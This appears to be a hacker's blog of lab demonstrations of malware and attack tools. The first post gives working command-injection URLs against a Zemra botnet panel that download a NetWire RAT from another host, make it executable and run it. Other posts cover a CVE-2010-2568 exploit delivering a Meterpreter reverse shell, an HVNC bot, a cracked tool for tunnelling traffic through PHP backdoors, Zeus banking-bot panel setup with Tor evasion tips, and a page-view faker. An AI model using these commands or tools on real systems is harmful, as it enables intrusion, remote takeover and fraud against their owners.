Zemra web panel hack with NetWIRE

Found a exploit for Zemra and used netwire to hack the Zemra web panel.

commands

wget downloads testlinux.out NetWire to the current directory http://192.168.56.141/zemra/system/
 http://192.168.56.141/zemra/system/command.php?cmd=wget http://192.168.56.207/testlinux.out



chmod 777 makes it possible to execute testlinux.out NetWire RAT
http://192.168.56.141/zemra/system/command.php?cmd=chmod 777 testlinux.out


./testlinux.out simply executes NetWire RAT
http://192.168.56.141/zemra/system/command.php?cmd=./testlinux.out

NetWire RAT:http://www.worldwiredlabs.com/netwire
Exploit:http://www.1337day.com/exploit/21663
My Video:http://youtu.be/w3Eo7HI8Bbk

HTTP Traffic 1.2 traffic generator

I downloaded HTTP Traffic 1.2 a jquery script that you can run on your local browser and tested it on my test blog testtraffic185.blogspot.com. I started out with 1 page view after running the tool I had 49 page views in Google stats.
video link http://youtu.be/RdK3wCbghSk

Sandboxie and meterpreter

Windows XP SP3 support ends April 8th, 2014. This is not good for people who are forced to use Windows XP at work. I decided to make a video showing a old CVE-2010-2568 exploit. The exploit worked and delivered a Metasploit reverse meterpreter tcp payload. The payload executed in the sandbox as soon as I terminated the programs in the sandbox the meterpeter session dies. I tried in meterpreter session to get getprivs and getsystem but they were blocked by Sandboxie. Sandboxie also prevented me from migrating the process. But I was able to download and upload files in the meterpreter session and get a shell so Sandboxie only minimizes the damage. Without Sandboxie everything worked as you would expect. Anyway this solution is only for those who are forced to use outdated software.

CVE-2010-2568 Exploit  http://www.exploit-db.com/exploits/14403/
You can get Sandboxie at http://www.sandboxie.com/index.php?DownloadSandboxie
Anyway this is my video http://youtu.be/3QVDIkXeRrc

HVNC (hidden vnc bot)

Tested this bot in a local network in vmware. Bot can have a hidden vnc session which is invisible to the user or a visible session like metasploit. This is probably a rip off leaked Zeus source code but their are new features such as capturing video from a webcam and password protection on vnc bot sessions unlike Zeus.
Check out the video at http://youtu.be/s3BGsata6Ow

Cracked VPSProxy Gold 2.5.0

I decided to show Cracked VPSProxy Gold 2.5.0 to give people an idea of how blackhats can tunnel their http and https traffic through a php backdoor or a chain of backdoors. They can even use a proxy before they connect to the php backdoors. I tested using Windows XP SP3 with cracked VPSProxy Gold 2.5.0 and used Kali as the server hosting the backdoor test.php.
Check the video out http://youtu.be/5a_IW7amGSQ

Zeus 2.7.6.8 Panel MMBB

The simplest way to test MMBB install wamp http://www.wampserver.com/en/ on Windows XP or higher vm.

Panel requires ioncube
http://downloads3.ioncube.com/loader_...

Bot only works as localhost! Attention skids take note skip this bot unless you can get it working with Tor yourself.

Only using localhost makes sense if want to use something like torifier
http://ratnetw0rk.blogspot.com/p/setu... such as in this video http://youtu.be/71pZd26Ogww

Bot version is Zeus 2.9.6.1
MMBB injects on IE 8 and Firefox 26 on windows xp sp3

VNC back connect works tested bk.exe server on windows 8.1

Zeus 2.7.6.8 MMBB Control Panel  video

http://youtu.be/RNgT2DkNSWk